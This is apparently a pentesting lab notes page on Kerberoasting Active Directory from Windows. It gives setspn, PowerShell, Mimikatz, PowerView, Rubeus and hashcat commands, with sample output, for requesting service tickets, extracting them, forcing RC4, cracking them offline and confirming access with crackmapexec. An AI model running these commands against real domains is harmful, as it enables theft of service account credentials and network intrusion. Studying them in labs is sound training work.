🔥Keberoasting with Windows

Kerberoasting Manual Method

Before tools like Rubeus we had to use a more manual process to steal or forge Kerberos tickets.

Enumerating SPNs with setspen.exe

We should focus on user account and ignore computer accounts returned.

setspn.exe -Q */*

Checking domain DC=INLANEFREIGHT,DC=LOCAL
CN=DC01,OU=Domain Controllers,DC=INLANEFREIGHT,DC=LOCAL
	Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/DC01.INLANEFREIGHT.LOCAL
	ldap/DC01.INLANEFREIGHT.LOCAL/ForestDnsZones.INLANEFREIGHT.LOCAL
	ldap/DC01.INLANEFREIGHT.LOCAL/DomainDnsZones.INLANEFREIGHT.LOCAL
	DNS/DC01.INLANEFREIGHT.LOCAL
	GC/DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT.LOCAL
	RestrictedKrbHost/DC01.INLANEFREIGHT.LOCAL
	RestrictedKrbHost/DC01
	RPC/03d2eace-bb3d-467e-a00a-eab0dbfaa065._msdcs.INLANEFREIGHT.LOCAL
	HOST/DC01/INLANEFREIGHT
	HOST/DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT"
	HOST/DC01
	HOST/DC01.INLANEFREIGHT.LOCAL
	HOST/DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT.LOCAL
	E3514235-4B06-11D1-AB04-00C04FC2DCD2/03d2eace-bb3d-467e-a00a-eab0dbfaa065/INLANEFREIGHT.LOCAL
	ldap/DC01/INLANEFREIGHT
	ldap/03d2eace-bb3d-467e-a00a-eab0dbfaa065._msdcs.INLANEFREIGHT.LOCAL
	ldap/DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT
	ldap/DC01
	ldap/DC01.INLANEFREIGHT.LOCAL
	ldap/DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT.LOCAL
CN=krbtgt,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
	kadmin/changepw
CN=svc_sql,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
	MSSQLSvc/SQL01.inlanefreight.local:1433
CN=sqlprod,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
	MSSQLSvc/SQL02.inlanefreight.local:1433
CN=sqldev,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
	MSSQLSvc/SQL-DEV01.inlanefreight.local:1433
CN=sqltest,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
	MSSQLSvc/DEVTEST.inlanefreight.local:1433
CN=sqlqa,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
	MSSQLSvc/QA001.inlanefreight.local:1433
CN=azureconnect,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
	adfsconnect/azure01.inlanefreight.local
CN=backupjob,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
	backupjob/veam001.inlanefreight.local
CN=WEB-WIN01,CN=Computers,DC=INLANEFREIGHT,DC=LOCAL
	RestrictedKrbHost/WEB-WIN01
	HOST/WEB-WIN01
	RestrictedKrbHost/WEB-WIN01.INLANEFREIGHT.LOCAL
	HOST/WEB-WIN01.INLANEFREIGHT.LOCAL
CN=MS01,CN=Computers,DC=INLANEFREIGHT,DC=LOCAL
	tapinego/MS01
	tapinego/MS01.INLANEFREIGHT.LOCAL
	TERMSRV/MS01
	TERMSRV/MS01.INLANEFREIGHT.LOCAL
	WSMAN/MS01
	WSMAN/MS01.INLANEFREIGHT.LOCAL
	RestrictedKrbHost/MS01
	HOST/MS01
	RestrictedKrbHost/MS01.INLANEFREIGHT.LOCAL
	HOST/MS01.INLANEFREIGHT.LOCAL

Existing SPN found!

Target a User

We can request TGS tickets for an account and load them into memory with PowerShell

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"

Getting All Tickets Using setspn.exe

 setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

Extracting Ticket using Mimikatz

If we don't specify base64 /out:true Mimikatz will extract tickets and write them to .kirbi file.

We have a base64 blob we can now prepare for cracking

Using 'mimikatz.log' for logfile : OK

mimikatz # base64 /out:true
isBase64InterceptInput  is false
isBase64InterceptOutput is true

mimikatz # kerberos::list /export 

===================
GwtodGItc3R1ZGVudKMHAwUAQKEAAKURGA8yMDIyMDIyNDIzMzYyMlqmERgPMjAy
MjAyMjUwODU1MjVapxEYDzIwMjIwMzAzMjI1NTI1WqgVGxNJTkxBTkVGUkVJR0hU
LkxPQ0FMqTswOaADAgECoTIwMBsITVNTUUxTdmMbJERFVi1QUkUtU1FMLmlubGFu
ZWZyZWlnaHQubG9jYWw6MTQzMw==
====================

Preparing Base64 Blob

We remove new lines and white spaces from our base64 blob

echo "<base64 blob>" |  tr -d \\n

Placing the Output into a .kirbi File

We place the output into a file and convert it to a .kirbi file

cat encoded_file | base64 -d > sqldev.kirbi

Extract The Ticket from the TGS File

We can then create file called crack_file

python2.7 kirbi2john.py sqldev.kirbi > crack_file

Modify for Hashcat and Cracking

We must modify the file so we can use it in Hashcat

sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat

Now we can attempt to crack it

hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt

Automated Kerberoasting

While it's good to understand how to manually perform Keberoasting it's much more efficient to use automated tools to do the job faster.

Using PowerView to Extract TGS Tickets

Import-Module .\PowerView.ps1
PS C:\htb> Get-DomainUser * -spn | select samaccountname

Using PowerView To Target a User

 Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat

Exporting Tickets to a CSV File

Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation

Using Rubeus

Rubeus is a powerful tool for attacking Kerberos is an adaption of the Kekeo tool. It has many attacks like overpass the hash, ticket request, harvesting, pass the ticket, AS-REP Roasting and of course Kerberoasting.

Using the /stats Flag

We can see potential users that can kerberoastable, when the users passwords have been set and plenty more.

Rubeus.exe kerberoast /stats

Using the /nowrap Flag

Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap

Encryption Types

Kerberoating tools usaully request RC4 Encrption when performing the attack, RC4 is weaker and easier to crack offline than other encryption algorithms like AES-128 and AES-256.

Basic Rubeus Example for RC4

We attack a specific user; testspn in this case

Rubeus.exe kerberoast /user:testspn /nowrap

We check to see with PowerView what encryption type is used

msDS-SupportedEncryptionTypes=0 means the type is not defined and the default RC4_HMAC_MD5 will be used

Get-DomainUser testspn -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes

We attempt to crack the hash with Hashcat

hashcat -m 13100 rc4_to_crack /usr/share/wordlists/rockyou.txt

Rubeus with Other Encryption Types

We can check like before for what encryption type is being used

msDS-SupportedEncryptionTypes=24 means that the AES 128/256 are the only ones supported

Get-DomainUser testspn -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes

We can now request a new ticket with Rubeus,

Rubeus.exe kerberoast /user:testspn /nowrap

As before we can pass it into Hashcat with the correct hashmode, 19700 in this case

hashcat -m 19700 aes_to_crack /usr/share/wordlists/rockyou.txt

Using the /tgtdeleg Flag

We can use the /tgtdeleg flag to specify we want only RC4 encryption when requesting a new service ticket.

Rubeus.exe kerberoast /tgtdeleg /user:testspn /nowrap

Harvesting Tickets using Rubeus

To begin harvesting tickets from the KDC we make sure Rubues is Installed on the target machine

Rubeus.exe harvest /interval:<NUM_OF_SECONDS>

Testing Access against DC

Once cracked we can confirm our access with a tool like crackmapexec

sudo crackmapexec smb IP -u user -p crackpassword

PreviousKeberoasting with Linux NextAccess Control List (ACL)

Last updated 1 year ago

hashtagKerberoasting Manual Method

hashtagEnumerating SPNs with setspen.exe

hashtagTarget a User

hashtagGetting All Tickets Using setspn.exe

hashtagExtracting Ticket using Mimikatz

hashtagPreparing Base64 Blob

hashtagPlacing the Output into a .kirbi File

hashtagExtract The Ticket from the TGS File

hashtagModify for Hashcat and Cracking

hashtagAutomated Kerberoasting

hashtagUsing PowerView to Extract TGS Tickets

hashtagUsing PowerView To Target a User

hashtagExporting Tickets to a CSV File

hashtagUsing Rubeus

hashtagUsing the /stats Flag

hashtagUsing the /nowrap Flag

hashtagEncryption Types

hashtagBasic Rubeus Example for RC4

hashtagRubeus with Other Encryption Types

hashtagUsing the /tgtdeleg Flag

hashtagHarvesting Tickets using Rubeus

hashtagTesting Access against DC